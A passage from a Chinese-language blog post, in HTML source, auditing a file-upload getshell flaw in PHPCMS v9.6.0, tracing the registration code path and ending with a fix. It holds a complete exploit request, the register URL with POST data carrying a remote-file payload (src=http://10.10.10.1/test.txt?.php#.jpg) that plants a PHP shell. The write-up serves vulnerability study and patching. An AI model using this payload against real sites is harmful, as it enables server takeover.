class="line">php</span><br></pre></td></tr></table></figure>
<p>将后缀名取出之后没有做任何检测，那后面呢？我们继续向下看。将后缀名传入getname函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getname</span>(<span class="params"><span class="variable">$fileext</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">date</span>(<span class="string">&#x27;Ymdhis&#x27;</span>).<span class="title function_ invoke__">rand</span>(<span class="number">100</span>, <span class="number">999</span>).<span class="string">&#x27;.&#x27;</span>.<span class="variable">$fileext</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>直接拼接后缀名，依然没有任何过滤。。。下面就直接下载文件并重命名，此时我们放在远程主机上的txt文件就被保存为了php文件，导致getshell。这里对url处理不当，以及<code>前面一次过滤就以为万事大吉</code>导致这个漏洞的产生。</p>
<p>找到了漏洞存在的地方，下面就要寻找一个触发漏洞的地方。<br>全局搜索一下，发现调用download函数的地方有不少：<br><img src="https://seaii-blog.com/usr/uploads/2017/04/4035936213.jpg" alt="QQ截图20170423222512.jpg"></p>
<p>这里以<code>caches/caches_model/caches_data/member_input.class.php</code>为例：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">editor</span>(<span class="params"><span class="variable">$field</span>, <span class="variable">$value</span></span>) </span>&#123;</span><br><span class="line">		<span class="variable">$setting</span> = <span class="title function_ invoke__">string2array</span>(<span class="variable">$this</span>-&gt;fields[<span class="variable">$field</span>][<span class="string">&#x27;setting&#x27;</span>]);</span><br><span class="line">		<span class="variable">$enablesaveimage</span> = <span class="variable">$setting</span>[<span class="string">&#x27;enablesaveimage&#x27;</span>];</span><br><span class="line">		<span class="variable">$site_setting</span> = <span class="title function_ invoke__">string2array</span>(<span class="variable">$this</span>-&gt;site_config[<span class="string">&#x27;setting&#x27;</span>]);</span><br><span class="line">		<span class="variable">$watermark_enable</span> = <span class="title function_ invoke__">intval</span>(<span class="variable">$site_setting</span>[<span class="string">&#x27;watermark_enable&#x27;</span>]);</span><br><span class="line">		<span class="variable">$value</span> = <span class="variable language_">$this</span>-&gt;attachment-&gt;<span class="title function_ invoke__">download</span>(<span class="string">&#x27;content&#x27;</span>, <span class="variable">$value</span>,<span class="variable">$watermark_enable</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="variable">$value</span>;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到没有对$value做任何过滤，那么editor函数又在哪里被调用了呢？看大牛的paper说是<code>动态调用</code>的。。。。（这不就超出我的能力范围了嘛。。），调用的地方在同文件的get函数里：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get</span>(<span class="params"><span class="variable">$data</span></span>) </span>&#123;</span><br><span class="line">		<span class="variable language_">$this</span>-&gt;data = <span class="variable">$data</span> = <span class="title function_ invoke__">trim_script</span>(<span class="variable">$data</span>);</span><br><span class="line">		<span class="variable">$model_cache</span> = <span class="title function_ invoke__">getcache</span>(<span class="string">&#x27;member_model&#x27;</span>, <span class="string">&#x27;commons&#x27;</span>);</span><br><span class="line">		<span class="variable language_">$this</span>-&gt;db-&gt;table_name = <span class="variable language_">$this</span>-&gt;db_pre.<span class="variable">$model_cache</span>[<span class="variable language_">$this</span>-&gt;modelid][<span class="string">&#x27;tablename&#x27;</span>];</span><br><span class="line"></span><br><span class="line">		<span class="variable">$info</span> = <span class="keyword">array</span>();</span><br><span class="line">		<span class="variable">$debar_filed</span> = <span class="keyword">array</span>(<span class="string">&#x27;catid&#x27;</span>,<span class="string">&#x27;title&#x27;</span>,<span class="string">&#x27;style&#x27;</span>,<span class="string">&#x27;thumb&#x27;</span>,<span class="string">&#x27;status&#x27;</span>,<span class="string">&#x27;islink&#x27;</span>,<span class="string">&#x27;description&#x27;</span>);</span><br><span class="line">		<span class="keyword">if</span>(<span class="title function_ invoke__">is_array</span>(<span class="variable">$data</span>)) &#123;</span><br><span class="line">			<span class="keyword">foreach</span>(<span class="variable">$data</span> <span class="keyword">as</span> <span class="variable">$field</span>=&gt;<span class="variable">$value</span>) &#123;</span><br><span class="line">				<span class="keyword">if</span>(<span class="variable">$data</span>[<span class="string">&#x27;islink&#x27;</span>]==<span class="number">1</span> &amp;&amp; !<span class="title function_ invoke__">in_array</span>(<span class="variable">$field</span>,<span class="variable">$debar_filed</span>)) <span class="keyword">continue</span>;</span><br><span class="line">				<span class="variable">$field</span> = <span class="title function_ invoke__">safe_replace</span>(<span class="variable">$field</span>);</span><br><span class="line">				<span class="variable">$name</span> = <span class="variable language_">$this</span>-&gt;fields[<span class="variable">$field</span>][<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">				<span class="variable">$minlength</span> = <span class="variable language_">$this</span>-&gt;fields[<span class="variable">$field</span>][<span class="string">&#x27;minlength&#x27;</span>];</span><br><span class="line">				<span class="variable">$maxlength</span> = <span class="variable language_">$this</span>-&gt;fields[<span class="variable">$field</span>][<span class="string">&#x27;maxlength&#x27;</span>];</span><br><span class="line">				<span class="variable">$pattern</span> = <span class="variable language_">$this</span>-&gt;fields[<span class="variable">$field</span>][<span class="string">&#x27;pattern&#x27;</span>];</span><br><span class="line">				<span class="variable">$errortips</span> = <span class="variable language_">$this</span>-&gt;fields[<span class="variable">$field</span>][<span class="string">&#x27;errortips&#x27;</span>];</span><br><span class="line">				<span class="keyword">if</span>(<span class="keyword">empty</span>(<span class="variable">$errortips</span>)) <span class="variable">$errortips</span> = <span class="string">&quot;<span class="subst">$name</span> 不符合要求！&quot;</span>;</span><br><span class="line">				<span class="variable">$length</span> = <span class="keyword">empty</span>(<span class="variable">$value</span>) ? <span class="number">0</span> : <span class="title function_ invoke__">strlen</span>(<span class="variable">$value</span>);</span><br><span class="line">				<span class="keyword">if</span>(<span class="variable">$minlength</span> &amp;&amp; <span class="variable">$length</span> &lt; <span class="variable">$minlength</span> &amp;&amp; !<span class="variable">$isimport</span>) <span class="title function_ invoke__">showmessage</span>(<span class="string">&quot;<span class="subst">$name</span> 不得少于 <span class="subst">$minlength</span> 个字符！&quot;</span>);</span><br><span class="line">				<span class="keyword">if</span> (!<span class="title function_ invoke__">array_key_exists</span>(<span class="variable">$field</span>, <span class="variable">$this</span>-&gt;fields)) <span class="title function_ invoke__">showmessage</span>(<span class="string">&#x27;模型中不存在&#x27;</span>.<span class="variable">$field</span>.<span class="string">&#x27;字段&#x27;</span>);</span><br><span class="line">				<span class="keyword">if</span>(<span class="variable">$maxlength</span> &amp;&amp; <span class="variable">$length</span> &gt; <span class="variable">$maxlength</span> &amp;&amp; !<span class="variable">$isimport</span>) &#123;</span><br><span class="line">					<span class="title function_ invoke__">showmessage</span>(<span class="string">&quot;<span class="subst">$name</span> 不得超过 <span class="subst">$maxlength</span> 个字符！&quot;</span>);</span><br><span class="line">				&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">					<span class="title function_ invoke__">str_cut</span>(<span class="variable">$value</span>, <span class="variable">$maxlength</span>);</span><br><span class="line">				&#125;</span><br><span class="line">				<span class="keyword">if</span>(<span class="variable">$pattern</span> &amp;&amp; <span class="variable">$length</span> &amp;&amp; !<span class="title function_ invoke__">preg_match</span>(<span class="variable">$pattern</span>, <span class="variable">$value</span>) &amp;&amp; !<span class="variable">$isimport</span>) <span class="title function_ invoke__">showmessage</span>(<span class="variable">$errortips</span>);</span><br><span class="line">	            <span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;fields[<span class="variable">$field</span>][<span class="string">&#x27;isunique&#x27;</span>] &amp;&amp; <span class="variable language_">$this</span>-&gt;db-&gt;<span class="title function_ invoke__">get_one</span>(<span class="keyword">array</span>(<span class="variable">$field</span>=&gt;<span class="variable">$value</span>),<span class="variable">$field</span>) &amp;&amp; ROUTE_A != <span class="string">&#x27;edit&#x27;</span>) <span class="title function_ invoke__">showmessage</span>(<span class="string">&quot;<span class="subst">$name</span> 的值不得重复！&quot;</span>);</span><br><span class="line">				<span class="variable">$func</span> = <span class="variable language_">$this</span>-&gt;fields[<span class="variable">$field</span>][<span class="string">&#x27;formtype&#x27;</span>];</span><br><span class="line">				<span class="keyword">if</span>(<span class="title function_ invoke__">method_exists</span>(<span class="variable">$this</span>, <span class="variable">$func</span>)) <span class="variable">$value</span> = <span class="variable language_">$this</span>-&gt;<span class="variable">$func</span>(<span class="variable">$field</span>, <span class="variable">$value</span>);</span><br><span class="line">	</span><br><span class="line">				<span class="variable">$info</span>[<span class="variable">$field</span>] = <span class="variable">$value</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">return</span> <span class="variable">$info</span>;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>先对 $data  先做了 trim  去除两头空白字符的处理。<br><code>if($data[&#39;islink&#39;]==1 &amp;&amp; !in_array($field,$debar_filed)) continue;</code><br>然后如果传入的字段在黑名单里面，则不能继续执行，所以我们需要<br>在<code>caches/caches_model/caches_data/model_field_1.cache.php</code>文件里面找到合适的field 名。<br>然后使用safe_replace函数来处理：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">safe_replace</span>(<span class="params"><span class="variable">$string</span></span>) </span>&#123;</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;%20&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;%27&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;%2527&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;*&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;&quot;&#x27;</span>,<span class="string">&#x27;&amp;quot;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&quot;&#x27;&quot;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;&quot;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;&lt;&#x27;</span>,<span class="string">&#x27;&amp;lt;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;&gt;&#x27;</span>,<span class="string">&#x27;&amp;gt;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&quot;&#123;&quot;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;&#125;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="variable">$string</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;\\&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$string</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="variable">$string</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>没啥影响，继续向下看：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$func</span> = <span class="variable language_">$this</span>-&gt;fields[<span class="variable">$field</span>][<span class="string">&#x27;formtype&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">method_exists</span>(<span class="variable">$this</span>, <span class="variable">$func</span>)) <span class="variable">$value</span> = <span class="variable language_">$this</span>-&gt;<span class="variable">$func</span>(<span class="variable">$field</span>, <span class="variable">$value</span>);</span><br></pre></td></tr></table></figure>
<p>我们要找的 field 的 formtype 值必须是 editor，先跟一下fields变量</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> <span class="variable">$modelid</span>;</span><br><span class="line"><span class="keyword">var</span> <span class="variable">$fields</span>;</span><br><span class="line"><span class="keyword">var</span> <span class="variable">$data</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$modelid</span></span>) </span>&#123;</span><br><span class="line">    ......</span><br><span class="line">    <span class="variable language_">$this</span>-&gt;fields = <span class="title function_ invoke__">getcache</span>(<span class="string">&#x27;model_field_&#x27;</span>.<span class="variable">$modelid</span>,<span class="string">&#x27;model&#x27;</span>);</span><br><span class="line">    ......</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>继续跟到getcache函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getcache</span>(<span class="params"><span class="variable">$name</span>, <span class="variable">$filepath</span>=<span class="string">&#x27;&#x27;</span>, <span class="variable">$type</span>=<span class="string">&#x27;file&#x27;</span>, <span class="variable">$config</span>=<span class="string">&#x27;&#x27;</span></span>) </span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/^[a-zA-Z0-9_-]+$/&quot;</span>, <span class="variable">$name</span>)) <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$filepath</span>!=<span class="string">&quot;&quot;</span> &amp;&amp; !<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/^[a-zA-Z0-9_-]+$/&quot;</span>, <span class="variable">$filepath</span>)) <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">	pc_base::<span class="title function_ invoke__">load_sys_class</span>(<span class="string">&#x27;cache_factory&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="number">0</span>);</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$config</span>) &#123;</span><br><span class="line">		<span class="variable">$cacheconfig</span> = pc_base::<span class="title function_ invoke__">load_config</span>(<span class="string">&#x27;cache&#x27;</span>);</span><br><span class="line">		<span class="variable">$cache</span> = cache_factory::<span class="title function_ invoke__">get_instance</span>(<span class="variable">$cacheconfig</span>)-&gt;<span class="title function_ invoke__">get_cache</span>(<span class="variable">$config</span>);</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="variable">$cache</span> = cache_factory::<span class="title function_ invoke__">get_instance</span>()-&gt;<span class="title function_ invoke__">get_cache</span>(<span class="variable">$type</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="variable">$cache</span>-&gt;<span class="title function_ invoke__">get</span>(<span class="variable">$name</span>, <span class="string">&#x27;&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$filepath</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>就是读取的<code>caches/caches_model/caches_data/model_field_&#123;$modelid&#125;.cache.php</code>文件，$modelid是我们可以控制的（后面会提到），正好在<code>caches/caches_model/caches_data/model_field_1.cache.php</code>文件里面找到合适的 field 字段——<code>content</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">......</span><br><span class="line"><span class="string">&#x27;content&#x27;</span> =&gt; </span><br><span class="line">  <span class="keyword">array</span> (</span><br><span class="line">    <span class="string">&#x27;fieldid&#x27;</span> =&gt; <span class="string">&#x27;8&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;modelid&#x27;</span> =&gt; <span class="string">&#x27;1&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;siteid&#x27;</span> =&gt; <span class="string">&#x27;1&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;field&#x27;</span> =&gt; <span class="string">&#x27;content&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;name&#x27;</span> =&gt; <span class="string">&#x27;内容&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;tips&#x27;</span> =&gt; <span class="string">&#x27;&lt;div class=&quot;content_attr&quot;&gt;&lt;label&gt;&lt;input name=&quot;add_introduce&quot; type=&quot;checkbox&quot;  value=&quot;1&quot; checked&gt;是否截取内容&lt;/label&gt;&lt;input type=&quot;text&quot; name=&quot;introcude_length&quot; value=&quot;200&quot; size=&quot;3&quot;&gt;字符至内容摘要</span></span><br><span class="line"><span class="string">&lt;label&gt;&lt;input type=\&#x27;checkbox\&#x27; name=\&#x27;auto_thumb\&#x27; value=&quot;1&quot; checked&gt;是否获取内容第&lt;/label&gt;&lt;input type=&quot;text&quot; name=&quot;auto_thumb_no&quot; value=&quot;1&quot; size=&quot;2&quot; class=&quot;&quot;&gt;张图片作为标题图片</span></span><br><span class="line"><span class="string">&lt;/div&gt;&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;css&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;minlength&#x27;</span> =&gt; <span class="string">&#x27;1&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;maxlength&#x27;</span> =&gt; <span class="string">&#x27;999999&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;pattern&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;errortips&#x27;</span> =&gt; <span class="string">&#x27;内容不能为空&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;formtype&#x27;</span> =&gt; <span class="string">&#x27;editor&#x27;</span>,</span><br><span class="line">......</span><br></pre></td></tr></table></figure>
<p>因为这个文件是 cache 文件，根据其命名规范，找其对应的 module 文件就好了,对应的目录为： &#x2F;phpcms&#x2F;modules&#x2F;member&#x2F; ，我们重点关注哪个文件中的方法中用了 $member_input‐&gt;get  方法，并且这个方法可以在前台调用。<br><img src="https://seaii-blog.com/usr/uploads/2017/04/848829914.jpg" alt="![]()"></p>
<p>这三处看了一下只有&#x2F;phpcms&#x2F;modules&#x2F;member&#x2F;index.php  中的 register 方法比较适合利用，关键代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//附表信息验证 通过模型获取会员信息</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$member_setting</span>[<span class="string">&#x27;choosemodel&#x27;</span>]) &#123;</span><br><span class="line">    <span class="keyword">require_once</span> CACHE_MODEL_PATH.<span class="string">&#x27;member_input.class.php&#x27;</span>;</span><br><span class="line">    <span class="keyword">require_once</span> CACHE_MODEL_PATH.<span class="string">&#x27;member_update.class.php&#x27;</span>;</span><br><span class="line">    <span class="variable">$member_input</span> = <span class="keyword">new</span> <span class="title function_ invoke__">member_input</span>(<span class="variable">$userinfo</span>[<span class="string">&#x27;modelid&#x27;</span>]);		</span><br><span class="line">    <span class="variable">$_POST</span>[<span class="string">&#x27;info&#x27;</span>] = <span class="title function_ invoke__">array_map</span>(<span class="string">&#x27;new_html_special_chars&#x27;</span>,<span class="variable">$_POST</span>[<span class="string">&#x27;info&#x27;</span>]);</span><br><span class="line">    <span class="variable">$user_model_info</span> = <span class="variable">$member_input</span>-&gt;<span class="title function_ invoke__">get</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;info&#x27;</span>]);				        				</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>$_POST[‘info’]经过new_html_special_chars函数，将文本转化为html实体</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">new_html_special_chars</span>(<span class="params"><span class="variable">$string</span></span>) </span>&#123;</span><br><span class="line">	<span class="variable">$encoding</span> = <span class="string">&#x27;utf-8&#x27;</span>;</span><br><span class="line">	<span class="keyword">if</span>(<span class="title function_ invoke__">strtolower</span>(CHARSET)==<span class="string">&#x27;gbk&#x27;</span>) <span class="variable">$encoding</span> = <span class="string">&#x27;ISO-8859-15&#x27;</span>;</span><br><span class="line">	<span class="keyword">if</span>(!<span class="title function_ invoke__">is_array</span>(<span class="variable">$string</span>)) </span><br><span class="line">            <span class="keyword">return</span> <span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$string</span>,ENT_QUOTES,<span class="variable">$encoding</span>);</span><br><span class="line">	<span class="keyword">foreach</span>(<span class="variable">$string</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$val</span>) </span><br><span class="line">            <span class="variable">$string</span>[<span class="variable">$key</span>] = <span class="title function_ invoke__">new_html_special_chars</span>(<span class="variable">$val</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="variable">$string</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>还记得这个modelid吗？在member_input.class.php中可以通过这个变量获取到我们想要的field值，而现在我们发现，这个变量是可控的，是不是很开心？</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//仍然在register方法中</span></span><br><span class="line"><span class="variable">$userinfo</span>[<span class="string">&#x27;modelid&#x27;</span>] = <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;modelid&#x27;</span>]) ? <span class="title function_ invoke__">intval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;modelid&#x27;</span>]) : <span class="number">10</span>;</span><br></pre></td></tr></table></figure>
<p>经过这么久的分析，终于到了最后一击。结合我们上面的一系列分析，只要 $_POST[‘info’]  中的 content  字段的值有 src&#x3D;<a target="_blank" rel="noopener" href="http://10.10.10.1/test.txt?.php#.jpg">http://10.10.10.1/test.txt?.php#.jpg</a> 这个字符串或者把 src  替换成 href  就能触发漏洞了。</p>
<p>最后再啰嗦啰嗦，总体上分析一下这个<code>src=http://10.10.10.1/test.txt?.php#.jpg</code>payload：<br>    1. 取出src的值，并且验证后缀名的合法性，利用#.jpg绕过<br>    2. 去除锚点，src变为<a target="_blank" rel="noopener" href="http://127.0.0.1/test.txt?.php">http://127.0.0.1/test.txt?.php</a><br>    3. 获取远程文件后缀名，由于使用了strrchr函数，导致取得的后缀名为php<br>    4. 直接copy远程文件，并重命名，shell已经写入目标主机中<br>ps.关于test.txt?.php为什么是这样，上两个图应该就明白了<br><img src="https://seaii-blog.com/usr/uploads/2017/04/1434102055.jpg" alt="QQ截图20170423230642.jpg"></p>
<p><img src="https://seaii-blog.com/usr/uploads/2017/04/2331739971.jpg" alt="QQ截图20170423230706.jpg"></p>
<h3 id="0x03漏洞利用"><a href="#0x03漏洞利用" class="headerlink" title="0x03漏洞利用"></a>0x03漏洞利用</h3><p>忙活了这么半天就为了这一刻啊~<br>首先进入注册页面 &#x2F;index.php?m&#x3D;member&amp;c&#x3D;index&amp;a&#x3D;register&amp;siteid&#x3D;1<br>填写注册信息后抓包<br><img src="https://seaii-blog.com/usr/uploads/2017/04/503421104.jpg" alt="QQ截图20170423231203.jpg"></p>
<p>参考这个可以构造info[content]参数<br><img src="https://seaii-blog.com/usr/uploads/2017/04/917996438.jpg" alt="QQ截图20170423231500.jpg"></p>
<p>但是像这样提交是会报模块中没有birthday字段错误的，那去掉就好了~<br>最终利用方式如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">url: /index.php?m=member&amp;c=index&amp;a=register&amp;siteid=1 </span><br><span class="line">post数据：siteid=1&amp;modelid=11&amp;username=abcd&amp;password=123456&amp;email=abcd@qq.com&amp;info[content]=src=http://10.10.10.1/test.txt?.php#.jpg&amp;dosubmit=1&amp;protocol=</span><br></pre></td></tr></table></figure>
<p><img src="https://seaii-blog.com/usr/uploads/2017/04/3963959493.jpg" alt="QQ截图20170422225432.jpg"></p>
<p><img src="https://seaii-blog.com/usr/uploads/2017/04/937792715.jpg" alt="QQ截图20170423234531.jpg"></p>
<h3 id="0x04漏洞修复"><a href="#0x04漏洞修复" class="headerlink" title="0x04漏洞修复"></a>0x04漏洞修复</h3><ol>
<li>在获取后缀名的时候再次验证后缀名的合法性<br>在 &#x2F;phpcms&#x2F;libs&#x2F;classes&#x2F;attachment.class.php 的166行后加上一行代码检查：<br><code>if(!preg_match(&quot;/($ext)/i&quot;, $filename)) continue;</code></li>
<li>下载9.6.1版。。。。。。</li>
</ol>
<h3 id="0x05总结"><a href="#0x05总结" class="headerlink" title="0x05总结"></a>0x05总结</h3><p>这篇文章写得很长，看起来可能有些啰嗦，我只是想把我的审计过程详细的记录下来。这次审计学到了很多东西，像<code>函数的动态调用</code>、<code>找到漏洞点之后再去寻找触发点</code>等，都是之前自己小打小闹的时候没有遇到过的。总而言之，水平有待提高啊。。。 </p>

        
        <br />
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>
        <div id="lv-container"></div>
        <div class="giscus"></div>
    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        

        

    </ul>
    
    <p>
        <span id="busuanzi_container_site_pv">
            <span id="busuanzi_value_site_pv"></span>PV
        </span>
        <span id="busuanzi_container_site_uv">
            <span id="busuanzi_value_site_uv"></span>UV
        </span>
        Created By <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>  Theme <a target="_blank" rel="noopener" href="https://github.com/aircloud/hexo-theme-aircloud">AirCloud</a></p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = ""
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

<script src="/js/index.js"></script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>






</html>
